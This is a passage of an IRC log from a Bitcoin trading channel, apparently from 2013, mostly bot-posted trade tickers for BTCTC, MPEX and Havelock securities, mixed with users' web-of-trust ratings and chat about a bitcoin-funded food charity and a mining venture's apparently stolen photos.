= 0.1966 BTC [+] Aug 02 09:55:10 [BTCTC] [LABCOIN] 600 @ 0.001967 = 1.1802 BTC [+] Aug 02 09:55:11 [BTCTC] [LABCOIN] 33 @ 0.001981 = 0.0654 BTC [+] Aug 02 09:55:12 [BTCTC] [LABCOIN] 100 @ 0.001982 = 0.1982 BTC [+] Aug 02 09:55:13 [BTCTC] [LABCOIN] 100 @ 0.001983 = 0.1983 BTC [+] Aug 02 09:55:14 [BTCTC] [LABCOIN] 1 @ 0.001984 BTC [+] Aug 02 09:55:16 [BTCTC] [LABCOIN] 1 @ 0.001985 BTC [+] Aug 02 09:55:17 [BTCTC] [LABCOIN] 33 @ 0.001992 = 0.0657 BTC [+] Aug 02 09:55:18 [BTCTC] [LABCOIN] 200 @ 0.001993 = 0.3986 BTC [+] Aug 02 09:55:19 [BTCTC] [LABCOIN] 166 @ 0.001999 = 0.3318 BTC [+] Aug 02 09:55:19 [BTCTC] [LABCOIN] 4 @ 0.001999 = 0.008 BTC [+] Aug 02 09:55:20 [BTCTC] [LABCOIN] 998 @ 0.002 = 1.996 BTC [+] Aug 02 09:55:48 ;;eauth mircea_popescu Aug 02 09:55:49 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Aug 02 09:55:53 [BTCTC] [ACTIVEMINING] 25 @ 0.006337 = 0.1584 BTC [+] Aug 02 09:55:54 [BTCTC] [ACTIVEMINING] 6 @ 0.006338 = 0.038 BTC [+] Aug 02 09:55:56 [BTCTC] [ACTIVEMINING] 125 @ 0.006354 = 0.7943 BTC [+] Aug 02 09:55:57 [BTCTC] [ACTIVEMINING] 500 @ 0.006355 = 3.1775 BTC [+] Aug 02 09:55:58 [BTCTC] [ACTIVEMINING] 162 @ 0.006367 = 1.0315 BTC [+] Aug 02 09:55:59 [BTCTC] [ACTIVEMINING] 650 @ 0.006368 = 4.1392 BTC [+] Aug 02 09:56:00 [BTCTC] [ACTIVEMINING] 106 @ 0.006379 = 0.6762 BTC [+] Aug 02 09:56:01 [BTCTC] [ACTIVEMINING] 125 @ 0.00638 = 0.7975 BTC [+] Aug 02 09:56:01 [BTCTC] [ACTIVEMINING] 300 @ 0.00638 = 1.914 BTC [+] Aug 02 09:56:02 [BTCTC] [ACTIVEMINING] 217 @ 0.006399 = 1.3886 BTC [+] Aug 02 09:56:04 [BTCTC] [ACTIVEMINING] 1000 @ 0.0064 = 6.4 BTC [+] Aug 02 09:56:05 [BTCTC] [ACTIVEMINING] 1000 @ 0.0064 = 6.4 BTC [+] Aug 02 09:56:10 ;;everify freenode:#bitcoin-otc:c0c106f7a99c2913c41ceff216f99bef59c0ffdaeb9df31a4c0ec368 Aug 02 09:56:12 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Aug 02 09:56:17 ;;rate parseval 1 pleasure to deal with. Aug 02 09:56:19 Rating entry successful. Your rating of 1 for user parseval has been recorded. Aug 02 09:56:39 [MPEX] [S.MPOE] 7230 @ 0.00081755 = 5.9109 BTC [+] Aug 02 09:57:01 hm Aug 02 09:57:04 [BTCTC] [LABCOIN] 1 @ 0.00198 BTC [-] Aug 02 09:57:05 ;;rate pars3val 1 pleasure to deal with. Aug 02 09:57:07 Rating entry successful. Your rating of 1 for user pars3val has been recorded. Aug 02 09:57:07 [BTCTC] [LABCOIN] 2 @ 0.002 = 0.004 BTC [+] Aug 02 09:57:29 [BTCTC] [BTCGARDEN] 5 @ 0.016 = 0.08 BTC [+] Aug 02 09:57:31 [BTCTC] [LABCOIN] 3 @ 0.002009 = 0.006 BTC [+] Aug 02 09:57:36 [BTCTC] [LABCOIN] 400 @ 0.002009 = 0.8036 BTC [+] Aug 02 09:57:37 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 02 09:57:37 [BTCTC] [LABCOIN] 20 @ 0.00201 = 0.0402 BTC [+] Aug 02 09:57:39 [BTCTC] [LABCOIN] 16 @ 0.00204 = 0.0326 BTC [+] Aug 02 09:57:40 [BTCTC] [LABCOIN] 100 @ 0.002041 = 0.2041 BTC [+] Aug 02 09:57:41 [BTCTC] [LABCOIN] 8 @ 0.002044 = 0.0164 BTC [+] Aug 02 09:57:42 [BTCTC] [LABCOIN] 50 @ 0.002045 = 0.1023 BTC [+] Aug 02 09:57:44 [BTCTC] [LABCOIN] 167 @ 0.002049 = 0.3422 BTC [+] Aug 02 09:57:45 [BTCTC] [LABCOIN] 1002 @ 0.00205 = 2.0541 BTC [+] Aug 02 09:57:46 [BTCTC] [LABCOIN] 5 @ 0.002148 = 0.0107 BTC [+] Aug 02 09:57:47 [BTCTC] [LABCOIN] 30 @ 0.002149 = 0.0645 BTC [+] Aug 02 09:57:48 [BTCTC] [LABCOIN] 431 @ 0.002187 = 0.9426 BTC [+] Aug 02 09:57:48 [BTCTC] [LABCOIN] 100 @ 0.002188 = 0.2188 BTC [+] Aug 02 09:57:49 [BTCTC] [LABCOIN] 1250 @ 0.002188 = 2.735 BTC [+] Aug 02 09:57:50 [BTCTC] [LABCOIN] 316 @ 0.002189 = 0.6917 BTC [+] Aug 02 09:57:51 [BTCTC] [LABCOIN] 1552 @ 0.002189 = 3.3973 BTC [+] Aug 02 09:57:52 [BTCTC] [LABCOIN] 1900 @ 0.00219 = 4.161 BTC [+] Aug 02 09:57:53 [BTCTC] [LABCOIN] 333 @ 0.002192 = 0.7299 BTC [+] Aug 02 09:57:54 [BTCTC] [LABCOIN] 2000 @ 0.002193 = 4.386 BTC [+] Aug 02 09:57:55 [BTCTC] [LABCOIN] 1096 @ 0.002194 = 2.4046 BTC [+] Aug 02 09:57:56 [BTCTC] [LABCOIN] 8850 @ 0.002195 = 19.4258 BTC [+] Aug 02 09:57:57 [BTCTC] [LABCOIN] 3 @ 0.002198 = 0.0066 BTC [+] Aug 02 09:57:58 [BTCTC] [LABCOIN] 14414 @ 0.002199 = 31.6964 BTC [+] Aug 02 09:58:42 [BTCTC] [LABCOIN] 4 @ 0.002198 = 0.0088 BTC [-] Aug 02 10:02:33 https://bitcointalk.org/index.php?action=profile;u=142358 Aug 02 10:02:38 View the profile of SatoshiDICE_Kat Aug 02 10:02:48 Whitelisted Aug 02 10:02:56 New PR person? Aug 02 10:04:59 what does whitelisted mean? Aug 02 10:05:22 [BTCTC] [BTCGARDEN] 20 @ 0.01599 = 0.3198 BTC [-] Aug 02 10:06:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.04175 = 0.4175 BTC [+] Aug 02 10:08:21 [BTCTC] [LABCOIN] 20 @ 0.002121 = 0.0424 BTC [-] Aug 02 10:08:39 Skipped requirements to post outside newbie forum Aug 02 10:08:43 [BTCTC] [LABCOIN] 20 @ 0.002122 = 0.0424 BTC [+] Aug 02 10:08:58 is the new owner still unknown? Aug 02 10:09:09 [BTCTC] [LABCOIN] 500 @ 0.002195 = 1.0975 BTC [+] Aug 02 10:09:56 [BTCTC] [BTCGARDEN] 800 @ 0.016 = 12.8 BTC [+] Aug 02 10:10:27 [BTCTC] [LABCOIN] 8 @ 0.002175 = 0.0174 BTC [-] Aug 02 10:10:29 [BTCTC] [LABCOIN] 282 @ 0.002196 = 0.6193 BTC [+] Aug 02 10:10:48 As far as I know, yes Aug 02 10:10:51 [BTCTC] [BTCGARDEN] 60 @ 0.016 = 0.96 BTC [+] Aug 02 10:19:02 [BTCTC] [RSM] 2 @ 0.01397 = 0.0279 BTC [+] Aug 02 10:20:36 https://bitcointalk.org/index.php?topic=261496.0 Aug 02 10:20:40 Who is Joey and Anita? Heres their "loan" story. Aug 02 10:20:51 quoted for 62 year old woman skype-ing naked suv gambling goodness Aug 02 10:22:36 [BTCTC] [ACTIVEMINING] 25 @ 0.006227 = 0.1557 BTC [-] Aug 02 10:22:37 [BTCTC] [ACTIVEMINING] 50 @ 0.006226 = 0.3113 BTC [-] Aug 02 10:22:39 [BTCTC] [ACTIVEMINING] 180 @ 0.00622 = 1.1196 BTC [-] Aug 02 10:22:39 [BTCTC] [ACTIVEMINING] 1 @ 0.006201 BTC [-] Aug 02 10:22:40 [BTCTC] [ACTIVEMINING] 5 @ 0.0062 = 0.031 BTC [-] Aug 02 10:22:41 [BTCTC] [ACTIVEMINING] 305 @ 0.006104 = 1.8617 BTC [-] Aug 02 10:22:42 https://bitcointalk.org/index.php?topic=266538.0 Aug 02 10:22:43 [BTCTC] [ACTIVEMINING] 600 @ 0.006103 = 3.6618 BTC [-] Aug 02 10:22:44 [BTCTC] [ACTIVEMINING] 620 @ 0.0061 = 3.782 BTC [-] Aug 02 10:22:45 [BTCTC] [ACTIVEMINING] 415 @ 0.006007 = 2.4929 BTC [-] Aug 02 10:22:46 [BTCTC] [ACTIVEMINING] 1661 @ 0.006006 = 9.976 BTC [-] Aug 02 10:22:47 [ANN] MAXBTC.COM Pool Shutting Down Aug 3rd, 2013 Aug 02 10:22:59 [BTCTC] [BTC-BOND] 2 @ 0.009999 = 0.02 BTC [+] Aug 02 10:24:48 [HAVELOCK] [LABCO] 36 @ 0.00249999 = 0.09 BTC [-] Aug 02 10:25:05 btct getting hammered Aug 02 10:26:39 [BTCTC] [ACTIVEMINING] 25 @ 0.006011 = 0.1503 BTC [+] Aug 02 10:26:41 [BTCTC] [ACTIVEMINING] 100 @ 0.00601 = 0.601 BTC [-] Aug 02 10:28:18 wish i was getting hammered Aug 02 10:28:30 [BTCTC] [BTCGARDEN] 399 @ 0.016 = 6.384 BTC [+] Aug 02 10:32:53 [HAVELOCK] [AM100] 9 @ 0.0395 = 0.3555 BTC [-] Aug 02 10:33:23 excessive wait? Aug 02 10:35:15 "2013 | June | There are now twice as much people hating Mircea Popescu as holding litecoins" Aug 02 10:35:23 sound like total degen gamblers Aug 02 10:38:17 [BTCTC] [ACTIVEMINING] 1 @ 0.005903 BTC [-] Aug 02 10:38:42 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002986 BTC [+] Aug 02 10:40:56 [BTCTC] [COGNITIVE] 2 @ 0.4617 = 0.9234 BTC [-] Aug 02 10:41:32 [BTCTC] [TAT.ASICMINER] 10 @ 0.0411 = 0.411 BTC [-] Aug 02 10:41:42 [BTCTC] [TAT.ASICMINER] 10 @ 0.0411 = 0.411 BTC [-] Aug 02 10:42:16 life at bitcoin foundation: http://imgur.com/a/ja7tG Aug 02 10:43:20 discussion: http://www.reddit.com/r/Bitcoin/comments/1jic5c/in_this_pot_is_the_13000th_meal_bitcoin_paid_for/ Aug 02 10:45:00 da fuck is in that pot Aug 02 10:45:19 "Kale and Corn chowder" dunno what's that Aug 02 10:45:43 [BTCTC] [BASIC-MINING] 1 @ 0.4604 BTC [-] Aug 02 10:46:07 Kale is a vegetable a bit like cabbage. Aug 02 10:46:11 and... you don't know what corn is? Aug 02 10:47:23 mkay... only find is ridiculous Aug 02 10:47:25 BigBitz i suppose he means it's not much like food Aug 02 10:47:31 europeans are srs bzn about their recipes. Aug 02 10:47:33 *find it Aug 02 10:47:54 what do you find ridiculous? Aug 02 10:48:05 the dude fees needy people by using bitcoin donations. Aug 02 10:48:23 [BTCTC] [LABCOIN] 20 @ 0.002191 = 0.0438 BTC [-] Aug 02 10:48:25 [BTCTC] [LABCOIN] 500 @ 0.002191 = 1.0955 BTC [-] Aug 02 10:48:27 [BTCTC] [LABCOIN] 10 @ 0.002192 = 0.0219 BTC [+] Aug 02 10:48:27 o like a soup kitchen ? Aug 02 10:48:28 [BTCTC] [LABCOIN] 250 @ 0.002194 = 0.5485 BTC [+] Aug 02 10:48:29 [BTCTC] [LABCOIN] 2000 @ 0.002195 = 4.39 BTC [+] Aug 02 10:48:30 [BTCTC] [LABCOIN] 1487 @ 0.002196 = 3.2655 BTC [+] Aug 02 10:48:31 [BTCTC] [LABCOIN] 1927 @ 0.002199 = 4.2375 BTC [+] Aug 02 10:48:31 [BTCTC] [LABCOIN] 71 @ 0.002199 = 0.1561 BTC [+] Aug 02 10:48:41 I believe so mircea_popescu. Aug 02 10:49:05 a ok. makes sense. Aug 02 10:49:40 [MPEX] [S.MPOE] 2400 @ 0.00082017 = 1.9684 BTC [+] Aug 02 10:49:42 [MPEX] [S.MPOE] 1250 @ 0.00082121 = 1.0265 BTC [+] Aug 02 10:49:51 [BTCTC] [LABCOIN] 74 @ 0.0022 = 0.1628 BTC [+] Aug 02 10:50:06 [BTCTC] [LABCOIN] 80 @ 0.002192 = 0.1754 BTC [-] Aug 02 10:50:25 [BTCTC] [LABCOIN] 146 @ 0.002191 = 0.3199 BTC [-] Aug 02 10:50:50 [BTCTC] [BITVPS] 1 @ 0.001575 BTC [-] Aug 02 10:51:07 [BTCTC] [LABCOIN] 69 @ 0.002201 = 0.1519 BTC [+] Aug 02 10:51:10 that looks like vomit Aug 02 10:51:20 [BTCTC] [LABCOIN] 31 @ 0.002191 = 0.0679 BTC [-] Aug 02 10:54:47 [BTCTC] [LABCOIN] 8 @ 0.002295 = 0.0184 BTC [+] Aug 02 10:54:48 [BTCTC] [LABCOIN] 50 @ 0.002296 = 0.1148 BTC [+] Aug 02 10:54:48 [BTCTC] [LABCOIN] 67 @ 0.002297 = 0.1539 BTC [+] Aug 02 10:54:49 [BTCTC] [LABCOIN] 300 @ 0.002297 = 0.6891 BTC [+] Aug 02 10:54:51 [BTCTC] [LABCOIN] 3 @ 0.002298 = 0.0069 BTC [+] Aug 02 10:54:56 it does, but this guy is really honorable. feeding homeless for months now. here is a video of his talk @bsan jose: http://www.youtube.com/watch?v=vOlKcpryJuc Aug 02 10:55:57 Could have explained a bit in his comment, it wasn't clear what it is about. Aug 02 10:56:02 [BTCTC] [BASIC-MINING] 10 @ 0.4604 = 4.604 BTC [-] Aug 02 10:56:03 [BTCTC] [BASIC-MINING] 1 @ 0.4604 BTC [-] Aug 02 10:57:07 [BTCTC] [ACTIVEMINING] 25 @ 0.006007 = 0.1502 BTC [+] Aug 02 10:57:09 [BTCTC] [ACTIVEMINING] 18 @ 0.006006 = 0.1081 BTC [-] Aug 02 10:57:10 [BTCTC] [ACTIVEMINING] 50 @ 0.006004 = 0.3002 BTC [-] Aug 02 10:57:11 [BTCTC] [ACTIVEMINING] 19 @ 0.005903 = 0.1122 BTC [-] Aug 02 10:57:13 [BTCTC] [ACTIVEMINING] 76 @ 0.005902 = 0.4486 BTC [-] Aug 02 10:57:13 i assume he is well known on reddit Aug 02 10:57:13 [BTCTC] [ACTIVEMINING] 275 @ 0.005841 = 1.6063 BTC [-] Aug 02 10:57:14 dunno, not something i would ever donate to Aug 02 10:57:14 [BTCTC] [ACTIVEMINING] 137 @ 0.00584 = 0.8001 BTC [-] Aug 02 10:57:24 jurov well he probably didn't expect ppl who have no idea who he is/what he does to check out his site. Aug 02 10:57:55 [BTCTC] [LABCOIN] 51 @ 0.002192 = 0.1118 BTC [-] Aug 02 10:57:57 [BTCTC] [BTCGARDEN] 152 @ 0.016 = 2.432 BTC [+] Aug 02 10:57:58 [BTCTC] [LABCOIN] 303 @ 0.002191 = 0.6639 BTC [-] Aug 02 10:57:59 [BTCTC] [LABCOIN] 5 @ 0.002191 = 0.011 BTC [-] Aug 02 10:58:41 [BTCTC] [TAT.ASICMINER] 10 @ 0.04175 = 0.4175 BTC [+] Aug 02 11:00:54 the beard's pretty cool anyway. Aug 02 11:12:15 [BTCTC] [TAT.MINIGAME] 3 @ 0.0002499 = 0.0007 BTC [+] Aug 02 11:12:43 [BTCTC] [ACTIVEMINING] 25 @ 0.005907 = 0.1477 BTC [+] Aug 02 11:13:05 [BTCTC] [ACTIVEMINING] 6 @ 0.005906 = 0.0354 BTC [-] Aug 02 11:13:06 [BTCTC] [ACTIVEMINING] 69 @ 0.005905 = 0.4074 BTC [-] Aug 02 11:13:58 [BTCTC] [ACTIVEMINING] 25 @ 0.006093 = 0.1523 BTC [+] Aug 02 11:13:59 [BTCTC] [ACTIVEMINING] 1661 @ 0.006094 = 10.1221 BTC [+] Aug 02 11:14:00 [BTCTC] [ACTIVEMINING] 50 @ 0.006095 = 0.3048 BTC [+] Aug 02 11:14:01 [BTCTC] [ACTIVEMINING] 1033 @ 0.00619 = 6.3943 BTC [+] Aug 02 11:14:02 [BTCTC] [ACTIVEMINING] 3000 @ 0.006195 = 18.585 BTC [+] Aug 02 11:14:59 [BTCTC] [LABCOIN] 1 @ 0.00203 BTC [-] Aug 02 11:15:39 [BTCTC] [LABCOIN] 1 @ 0.002257 BTC [+] Aug 02 11:17:22 [BTCTC] [BTC-TRADING-PT] 1 @ 0.8217 BTC [+] Aug 02 11:18:53 [BTCTC] [DMS.MINING] 1 @ 0.009189 BTC [-] Aug 02 11:19:16 [BTCTC] [ACTIVEMINING] 25 @ 0.005925 = 0.1481 BTC [-] Aug 02 11:19:18 [BTCTC] [ACTIVEMINING] 1684 @ 0.005925 = 9.9777 BTC [-] Aug 02 11:19:19 [BTCTC] [ACTIVEMINING] 1 @ 0.005924 BTC [-] Aug 02 11:23:50 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [+] Aug 02 11:25:59 [MPEX] [S.MPOE] 6650 @ 0.00082121 = 5.461 BTC [+] Aug 02 11:26:03 [MPEX] [S.MPOE] 411 @ 0.00082193 = 0.3378 BTC [+] Aug 02 11:29:26 http://www.btcgarden.com/deployment.jsp Aug 02 11:31:32 http://www.otg.com.br/otg/networking/infraestrutura/infraestrutura.html Aug 02 11:31:34 seems stolen Aug 02 11:31:36 OTG - Infra Estrutura de Data Center Aug 02 11:32:12 hehe, i was gunna say looks like an existing DC Aug 02 11:32:46 they will need bucketloads of money just for the infrastructure - dont worry about dev costs etc :P Aug 02 11:33:53 Graet intel person says "well it's lulzy that they've blurred it a little. amateur hour." Aug 02 11:34:21 [BTCTC] [TAT.ASICMINER] 5 @ 0.04176 = 0.2088 BTC [+] Aug 02 11:34:36 :P Aug 02 11:35:54 [BTCTC] [TAT.ASICMINER] 35 @ 0.04175 = 1.4613 BTC [-] Aug 02 11:36:27 i'm sure it is. remembers me of http://virtualminingcorp.com/shop1/img/p/3/0/30-thickbox_default.jpg Aug 02 11:37:40 http://www.powerbackups.net/cooling.html < the cdu Aug 02 11:37:42 Powerbackup Solutions - Cooling Aug 02 11:38:19 [BTCTC] [BTCGARDEN] 8765 @ 0.016 = 140.24 BTC [+] Aug 02 11:38:51 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 02 11:40:36 [BTCTC] [LABCOIN] 3 @ 0.002249 = 0.0067 BTC [-] Aug 02 11:40:38 [BTCTC] [LABCOIN] 20 @ 0.00225 = 0.045 BTC [+] Aug 02 11:40:39 [BTCTC] [LABCOIN] 3 @ 0.002256 = 0.0068 BTC [+] Aug 02 11:40:40 [BTCTC] [LABCOIN] 20 @ 0.002257 = 0.0451 BTC [+] Aug 02 11:40:41 [BTCTC] [LABCOIN] 5 @ 0.002259 = 0.0113 BTC [+] Aug 02 11:40:42 [BTCTC] [LABCOIN] 30 @ 0.00226 = 0.0678 BTC [+] Aug 02 11:40:43 [BTCTC] [LABCOIN] 86 @ 0.002276 = 0.1957 BTC [+] Aug 02 11:40:44 [BTCTC] [LABCOIN] 500 @ 0.002277 = 1.1385 BTC [+] Aug 02 11:42:28 [HAVELOCK] [AM100] 1 @ 0.039 BTC [-] Aug 02 11:43:44 [HAVELOCK] [AM100] 1 @ 0.03801 BTC [-] Aug 02 11:43:57 [BTCTC] [ACTIVEMINING] 15 @ 0.00627 = 0.0941 BTC [+] Aug 02 11:44:14 All images on btcgarden.com look stolen. Some are seen on multiple websites/news articles. Looks like stock photos. Aug 02 11:45:13 [HAVELOCK] [AM100] 2 @ 0.0378 = 0.0756 BTC [-] Aug 02 11:45:15 [BTCTC] [LABCOIN] 10 @ 0.00225 = 0.0225 BTC [-] Aug 02 11:45:16 [HAVELOCK] [AM100] 2 @ 0.0377 = 0.0754 BTC [-] Aug 02 11:45:19 [HAVELOCK] [AM100] 2 @ 0.0376 = 0.0752 BTC [-] Aug 02 11:45:21 [HAVELOCK] [AM100] 4 @ 0.0375 = 0.15 BTC [-] Aug 02 11:45:39 [HAVELOCK] [SMG] 100 @ 0.00026699 = 0.0267 BTC [+] Aug 02 11:45:49 Together, we vanquish. It shall be done. Aug 02 11:45:51 okay Aug 02 11:46:22 [BTCTC] [TAT.ASICMINER] 3 @ 0.0412 = 0.1236 BTC [-] Aug 02 11:46:46 [BTCTC] [BTCGARDEN] 109 @ 0.016 = 1.744 BTC [+] Aug 02 11:48:14 [MPEX] [S.MPOE] 6811 @ 0.00082193 = 5.5982 BTC [+] Aug 02 11:50:08 [BTCTC] [TAT.ASICMINER] 7 @ 0.04175 = 0.2923 BTC [+] Aug 02 11:50:34 [BTCTC] [BTCGARDEN] 69 @ 0.01599 = 1.1033 BTC [-] Aug 02 11:51:12 [BTCTC] [ASICMINER-PT] 1 @ 4.15 BTC [-] Aug 02 11:51:14 [BTCTC] [ASICMINER-PT] 5 @ 4.129 = 20.645 BTC [-] Aug 02 11:51:15 [BTCTC] [ASICMINER-PT] 5 @ 4.128 = 20.64 BTC [-] Aug 02 11:51:16 [BTCTC] [ASICMINER-PT] 12 @ 4.127 = 49.524 BTC [-] Aug 02 11:51:17 [BTCTC] [ASICMINER-PT] 2 @ 4.127 = 8.254 BTC [-] Aug 02 11:51:18 [BTCTC] [ASICMINER-PT] 4 @ 4.126 = 16.504 BTC [-] Aug 02 11:51:19 [BTCTC] [ASICMINER-PT] 10 @ 4.125 = 41.25 BTC [-] Aug 02 11:51:20 [BTCTC] [ASICMINER-PT] 1 @ 4.123 BTC [-] Aug 02 11:51:21 [BTCTC] [ASICMINER-PT] 7 @ 4.123 = 28.861 BTC [-] Aug 02 11:51:22 [BTCTC] [ASICMINER-PT] 7 @ 4.045 = 28.315 BTC [-] Aug 02 11:51:23 [BTCTC] [ASICMINER-PT] 10 @ 4.044 = 40.44 BTC [-] Aug 02 11:52:15 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.002986 = 0.0299 BTC [+] Aug 02 11:52:26 [03:45] Together, we vanquish. It shall be done. | [03:50] * Namworld (Namworld@96.23.132.75) Quit Aug 02 11:52:30 good job vanquishing Aug 02 11:52:31 :P Aug 02 11:55:03 Ukyo - I love that the asset bot is called "assbot" Aug 02 11:55:12 really appeals to my jivenile side Aug 02 11:55:15 :P Aug 02 11:55:28 hehehe Aug 02 11:58:11 [HAVELOCK] [SDSTM] 49 @ 0.008 = 0.392 BTC [-] Aug 02 11:58:13 [HAVELOCK] [SDSTM] 50 @ 0.008 = 0.4 BTC [-] Aug 02 11:58:16 [HAVELOCK] [LABCO] 50 @ 0.00249999 = 0.125 BTC [-] Aug 02 11:58:25 [BTCTC] [BTCGARDEN] 586 @ 0.01599 = 9.3701 BTC [-] Aug 02 11:58:42 [HAVELOCK] [LABCO] 50 @ 0.0025 = 0.125 BTC [+] Aug 02 12:02:44 [BTCTC] [DMS.MINING] 19 @ 0.009189 = 0.1746 BTC [-] Aug 02 12:03:14 [BTCTC] [DMS.MINING] 40 @ 0.00919 = 0.3676 BTC [+] Aug 02 12:04:23 [HAVELOCK] [SMG] 10 @ 0.000267 = 0.0027 BTC [+] Aug 02 12:04:53 [HAVELOCK] [LABCO] 8 @ 0.0025 = 0.02 BTC [+] Aug 02 12:08:05 [BTCTC] [ASICMINER-PT] 1 @ 4.06 BTC [+] Aug 02 12:10:07 [HAVELOCK] [SDSTM] 1 @ 0.00789 BTC [-] Aug 02 12:10:31 [BTCTC] [ACTIVEMINING] 25 @ 0.006001 = 0.15 BTC [-] Aug 02 12:11:12 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 02 12:14:14 [BTCTC] [DMS.MINING] 20 @ 0.009199 = 0.184 BTC [+] Aug 02 12:14:54 [MPEX] [S.MPOE] 9950 @ 0.0008196 = 8.155 BTC [-] Aug 02 12:15:19 [BTCTC] [BTCGARDEN] 40 @ 0.016 = 0.64 BTC [+] Aug 02 12:16:22 [MPEX] [S.MPOE] 5100 @ 0.0008196 = 4.18 BTC [-] Aug 02 12:20:18 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 02 12:25:21 [HAVELOCK] [SMG] 25 @ 0.00026699 = 0.0067 BTC [-] Aug 02 12:27:30 [BTCTC] [ACTIVEMINING] 25 @ 0.006067 = 0.1517 BTC [+] Aug 02 12:28:40 [BTCTC] [LABCOIN] 3 @ 0.002262 = 0.0068 BTC [+] Aug 02 12:30:32 [BTCTC] [BTCGARDEN] 12 @ 0.01596 = 0.1915 BTC [-] Aug 02 12:30:33 [BTCTC] [BTCGARDEN] 3050 @ 0.01596 = 48.678 BTC [-] Aug 02 12:30:35 [BTCTC] [BTCGARDEN] 4000 @ 0.01595 = 63.8 BTC [-] Aug 02 12:32:38 [BTCTC] [LABCOIN] 3 @ 0.002262 = 0.0068 BTC [+] Aug 02 12:32:40 [BTCTC] [LABCOIN] 20 @ 0.002263 = 0.0453 BTC [+] Aug 02 12:32:41 [BTCTC] [LABCOIN] 3 @ 0.002277 = 0.0068 BTC [+] Aug 02 12:32:42 [BTCTC] [LABCOIN] 19 @ 0.002278 = 0.0433 BTC [+] Aug 02 12:32:43 [BTCTC] [LABCOIN] 24 @ 0.002285 = 0.0548 BTC [+] Aug 02 12:32:44 [BTCTC] [LABCOIN] 500 @ 0.002286 = 1.143 BTC [+] Aug 02 12:32:45 [BTCTC] [LABCOIN] 4 @ 0.002288 = 0.0092 BTC [+] Aug 02 12:32:46 [BTCTC] [LABCOIN] 30 @ 0.002288 = 0.0686 BTC [+] Aug 02 12:32:47 [BTCTC] [LABCOIN] 403 @ 0.002298 = 0.9261 BTC [+] Aug 02 12:32:48 [BTCTC] [LABCOIN] 439 @ 0.00233 = 1.0229 BTC [+] Aug 02 12:33:34 [BTCTC] [BTCGARDEN] 10 @ 0.01594 = 0.1594 BTC [-] Aug 02 12:33:36 [BTCTC] [BTCGARDEN] 20 @ 0.01592 = 0.3184 BTC [-] Aug 02 12:33:37 [BTCTC] [BTCGARDEN] 183 @ 0.01591 = 2.9115 BTC [-] Aug 02 12:33:49 [BTCTC] [LABCOIN] 70 @ 0.00233 = 0.1631 BTC [+] Aug 02 12:35:45 [BTCTC] [ACTIVEMINING] 17 @ 0.006001 = 0.102 BTC [-] Aug 02 12:37:29 [BTCTC] [DMS.SELLING] 100 @ 0.0242 = 2.42 BTC [+] Aug 02 12:37:31 [BTCTC] [BTCGARDEN] 755 @ 0.01599 = 12.0725 BTC [+] Aug 02 12:37:32 [BTCTC] [DMS.SELLING] 2 @ 0.0242 = 0.0484 BTC [+] Aug 02 12:38:59 [BTCTC] [BTCGARDEN] 12 @ 0.016 = 0.192 BTC [+] Aug 02 12:40:05 [BTCTC] [BTCGARDEN] 50000 @ 0.016 = 800 BTC [+] Aug 02 12:40:14 [HAVELOCK] [HIM] 40 @ 0.15998999 = 6.3996 BTC [+] Aug 02 12:40:17 [HAVELOCK] [HIM] 10 @ 0.15999 = 1.5999 BTC [+] Aug 02 12:40:41 [BTCTC] [LABCOIN] 80 @ 0.002328 = 0.1862 BTC [-] Aug 02 12:41:01 [BTCTC] [ACTIVEMINING] 83 @ 0.006001 = 0.4981 BTC [-] Aug 02 12:41:03 [BTCTC] [ACTIVEMINING] 713 @ 0.006 = 4.278 BTC [-] Aug 02 12:41:04 [BTCTC] [ACTIVEMINING] 50 @ 0.006 = 0.3 BTC [-] Aug 02 12:42:18 [HAVELOCK] [LABCO] 3 @ 0.0025 = 0.0075 BTC [+] Aug 02 12:42:46 [BTCTC] [BTCGARDEN] 10000 @ 0.016 = 160 BTC [+] Aug 02 12:42:59 [BTCTC] [BTCGARDEN] 250 @ 0.016 = 4 BTC [+] Aug 02 12:43:28 [BTCTC] [LABCOIN] 1 @ 0.002299 BTC [-] Aug 02 12:43:29 [BTCTC] [LABCOIN] 30 @ 0.002315 = 0.0695 BTC [+] Aug 02 12:43:47 [BTCTC] [BTCGARDEN] 2504 @ 0.016 = 40.064 BTC [+] Aug 02 12:44:21 [BTCTC] [BTCGARDEN] 1600 @ 0.016 = 25.6 BTC [+] Aug 02 12:44:34 [BTCTC] [ACTIVEMINING] 25 @ 0.006049 = 0.1512 BTC [+] Aug 02 12:44:35 [BTCTC] [ACTIVEMINING] 3 @ 0.00605 = 0.0182 BTC [+] Aug 02 12:47:13 [BTCTC] [LABCOIN] 20 @ 0.002327 = 0.0465 BTC [+] Aug 02 12:47:15 [BTCTC] [LABCOIN] 70 @ 0.002328 = 0.163 BTC [+] Aug 02 12:47:16 [BTCTC] [LABCOIN] 20 @ 0.00233 = 0.0466 BTC [+] Aug 02 12:48:11 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 02 12:48:44 [HAVELOCK] [LABCO] 5 @ 0.0025 = 0.0125 BTC [+] Aug 02 12:50:29 [MPEX] [S.MPOE] 183 @ 0.0008196 = 0.15 BTC [-] Aug 02 12:50:30 [MPEX] [S.MPOE] 13167 @ 0.00081648 = 10.7506 BTC [-] Aug 02 12:54:50 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002986 BTC [+] Aug 02 13:04:27 [BTCTC] [ASICMINER-PT] 2 @ 4.149 = 8.298 BTC [+] Aug 02 13:06:16 [BTCTC] [LABCOIN] 20 @ 0.002136 = 0.0427 BTC [-] Aug 02 13:06:18 [BTCTC] [LABCOIN] 77 @ 0.002135 = 0.1644 BTC [-] Aug 02 13:06:19 [BTCTC] [ACTIVEMINING] 4 @ 0.006017 = 0.0241 BTC [-] Aug 02 13:06:20 [BTCTC] [LABCOIN] 467 @ 0.002134 = 0.9966 BTC [-] Aug 02 13:06:22 [BTCTC] [LABCOIN] 